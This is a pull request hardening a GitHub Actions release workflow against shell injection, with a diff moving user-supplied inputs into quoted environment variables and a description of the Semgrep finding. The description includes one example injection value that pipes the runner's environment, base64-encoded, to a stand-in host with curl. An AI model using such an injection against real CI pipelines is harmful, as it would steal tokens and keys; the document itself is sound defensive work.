### PR TITLE
fix(ci): prevent shell injection in release.yaml [sc-65836]

### DIFF
--- a/.github/workflows/release.yaml
+++ b/.github/workflows/release.yaml
@@ -40,18 +40,21 @@ jobs:
       - name: Set Custom Version
         id: custom_version
         if: inputs.version != ''
+        env:
+          INPUT_VERSION: ${{ inputs.version }}
+          REF_NAME: ${{ github.ref_name }}
         run: |
-          echo "Using custom version: ${{ inputs.version }}"
-          poetry version ${{ inputs.version }}
+          echo "Using custom version: $INPUT_VERSION"
+          poetry version "$INPUT_VERSION"
           git config user.name "galileo-automation"
           git config user.email "ci@rungalileo.io"
           git add pyproject.toml
-          git commit -m "chore: release version ${{ inputs.version }}"
-          git tag -a "v${{ inputs.version }}" -m "Release v${{ inputs.version }}"
-          git push origin HEAD:${{ github.ref_name }}
-          git push origin "v${{ inputs.version }}"
-          echo "released=true" >> $GITHUB_OUTPUT
-          echo "version=${{ inputs.version }}" >> $GITHUB_OUTPUT
+          git commit -m "chore: release version $INPUT_VERSION"
+          git tag -a "v$INPUT_VERSION" -m "Release v$INPUT_VERSION"
+          git push origin "HEAD:$REF_NAME"
+          git push origin "v$INPUT_VERSION"
+          echo "released=true" >> "$GITHUB_OUTPUT"
+          echo "version=$INPUT_VERSION" >> "$GITHUB_OUTPUT"
 
       # Semantic Release Path
       - name: Python Semantic Release
@@ -69,13 +72,19 @@ jobs:
       # Determine which release method was used
       - name: Set Release Status
         id: release
+        env:
+          INPUT_VERSION: ${{ inputs.version }}
+          CUSTOM_RELEASED: ${{ steps.custom_version.outputs.released }}
+          CUSTOM_VERSION: ${{ steps.custom_version.outputs.version }}
+          SEMANTIC_RELEASED: ${{ steps.semantic_release.outputs.released }}
+          SEMANTIC_VERSION: ${{ steps.semantic_release.outputs.version }}
         run: |
-          if [ "${{ inputs.version }}" != "" ]; then
-            echo "released=${{ steps.custom_version.outputs.released }}" >> $GITHUB_OUTPUT
-            echo "version=${{ steps.custom_version.outputs.version }}" >> $GITHUB_OUTPUT
+          if [ -n "$INPUT_VERSION" ]; then
+            echo "released=$CUSTOM_RELEASED" >> "$GITHUB_OUTPUT"
+            echo "version=$CUSTOM_VERSION" >> "$GITHUB_OUTPUT"
           else
-            echo "released=${{ steps.semantic_release.outputs.released }}" >> $GITHUB_OUTPUT
-            echo "version=${{ steps.semantic_release.outputs.version }}" >> $GITHUB_OUTPUT
+            echo "released=$SEMANTIC_RELEASED" >> "$GITHUB_OUTPUT"
+            echo "version=$SEMANTIC_VERSION" >> "$GITHUB_OUTPUT"
           fi
 
       - name: Build Package


### PR DESCRIPTION
# User description
**Shortcut:** [sc-65836 — Code Security - Galileo-Python Security Issues](https://app.shortcut.com/galileo/story/65836)

**Description:**

Semgrep flagged `.github/workflows/release.yaml` for shell injection (`yaml.github-actions.security.run-shell-injection.run-shell-injection`, [finding 766356719](https://semgrep.dev/orgs/galileo_ai/findings/766356719)) — severity **High**, confidence **High**, autotriage **true positive**.

The `Set Custom Version` step on line 43 interpolated `${{ inputs.version }}` and `${{ github.ref_name }}` directly into the shell. The `inputs.version` value comes from a `workflow_dispatch` input and is rendered into shell syntax at workflow-render time, so a value like `1.0.0"; curl evil/$(env|base64); "` would break out of the quoted argument and execute arbitrary commands on the runner — with the workflow's `id-token: write` and `contents: write` permissions, plus access to `GALILEO_AUTOMATION_GITHUB_TOKEN`, `GALILEO_AUTOMATION_SSH_PRIVATE_KEY`, and PyPI publish trust.

**Fix:** Move every `${{ inputs.* }}`, `${{ github.* }}`, and `${{ steps.*.outputs.* }}` reference inside `run:` blocks into the step's `env:` mapping, then reference them as double-quoted shell variables (`"$INPUT_VERSION"`, etc.). This is the pattern Semgrep recommends and it forces the runner to pass the value to argv as a single string instead of substituting it into shell syntax.

The same vulnerable pattern existed one step later in `Set Release Status` (using `inputs.version` and the `steps.custom_version` / `steps.semantic_release` outputs, which themselves carry the user-controlled version). Fixed in the same change for consistency, since a follow-up scan would have flagged it next.

```diff
       - name: Set Custom Version
         id: custom_version
         if: inputs.version != ''
+        env:
+          INPUT_VERSION: ${{ inputs.version }}
+          REF_NAME: ${{ github.ref_name }}
         run: |
-          echo "Using custom version: ${{ inputs.version }}"
-          poetry version ${{ inputs.version }}
+          echo "Using custom version: $INPUT_VERSION"
+          poetry version "$INPUT_VERSION"
           ...
-          git commit -m "chore: release version ${{ inputs.version }}"
-          git tag -a "v${{ inputs.version }}" -m "Release v${{ inputs.version }}"
-          git push origin HEAD:${{ github.ref_name }}
-          git push origin "v${{ inputs.version }}"
-          echo "released=true" >> $GITHUB_OUTPUT
-          echo "version=${{ inputs.version }}" >> $GITHUB_OUTPUT
+          git commit -m "chore: release version $INPUT_VERSION"
+          git tag -a "v$INPUT_VERSION" -m "Release v$INPUT_VERSION"
+          git push origin "HEAD:$REF_NAME"
+          git push origin "v$INPUT_VERSION"
+          echo "released=true" >> "$GITHUB_OUTPUT"
+          echo "version=$INPUT_VERSION" >> "$GITHUB_OUTPUT"
```

Behavior is unchanged for normal semver inputs (`1.2.3`, `2.0.0-beta.1`). The semantic-release path is untouched (it already uses a third-party action, not `run:`). `${{ vars.POETRY_V2_VERSION }}` is left as-is because repo variables can only be set by admins and are not attacker-controlled (Semgrep does not flag them).

**Tests:**

- [x] No unit tests needed — workflow-only change; `check-yaml` passes locally (`python -c "import yaml; yaml.safe_load(open('.github/workflows/release.yaml'))"` succeeds).
- [ ] [E2E Test](https://github.com/rungalileo/e2e-testing) Added — N/A, release workflow change.

The workflow runs only on `workflow_dispatch`, so it will be exercised on the next manual release. The two `if:` conditions (`inputs.version != ''` and `inputs.version == ''`) and the conditional output reads in `Set Release Status` produce the same outcomes as before — only the rendered shell is now safe.

Once this lands, the Semgrep finding should auto-close on the next scan.

Made with [Cursor](https://cursor.com)

---

# Generated description

Below is a concise technical summary of the changes proposed in this PR:
Secure the release workflow’s custom version step by moving user-controllable inputs into environment variables and referencing them as quoted shell values so the runner no longer interpolates <code>${{ inputs.version }}</code> directly. Protect the release status step by sourcing all inputs and outputs through env vars before echoing them, keeping the final output behavior unchanged while eliminating the shell injection vector.
<table><tr><th>Topic</th><th>Details</th><tr><td><a href=https://baz.co/changes/rungalileo/galileo-python/593?tool=ast&topic=Custom+Version>Custom Version</a>
        </td><td>Harden the custom version flow by binding <code>${{ inputs.version }}</code> and <code>${{ github.ref_name }}</code> to <code>env</code> variables and quoting <code>$INPUT_VERSION</code>/<code>$REF_NAME</code> inside the script so git operations and output emissions stay safe from shell injection.<details><summary>Modified files (1)</summary><ul><li>.github/workflows/release.yaml</li></ul></details><details><summary>Latest Contributors(2)</summary><table><tr><th>User</th><th>Commit</th><th>Date</th></tr><tr><td>shuaishao93@gmail.com</td><td>fix(ci): prevent shell...</td><td>May 26, 2026</td></tr>
<tr><td>nachiket@galileo.ai</td><td>feat: Enhance release ...</td><td>October 23, 2025</td></tr></table></details></td></tr>
<tr><td><a href=https://baz.co/changes/rungalileo/galileo-python/593?tool=ast&topic=Release+Status>Release Status</a>
        </td><td>Guard release status computation by exposing the workflow inputs and previous step outputs through <code>env</code> variables and echoing the quoted values when deciding which path released/version values to emit.<details><summary>Modified files (1)</summary><ul><li>.github/workflows/release.yaml</li></ul></details><details><summary>Latest Contributors(2)</summary><table><tr><th>User</th><th>Commit</th><th>Date</th></tr><tr><td>shuaishao93@gmail.com</td><td>fix(ci): prevent shell...</td><td>May 26, 2026</td></tr>
<tr><td>nachiket@galileo.ai</td><td>feat: Enhance release ...</td><td>October 23, 2025</td></tr></table></details></td></tr></table>
<sub><a href="https://baz.co/changes/rungalileo/galileo-python/593?tool=ast">Review this PR on Baz</a> | <a href="https://baz.co/agents/baz">Customize your next review</a></sub>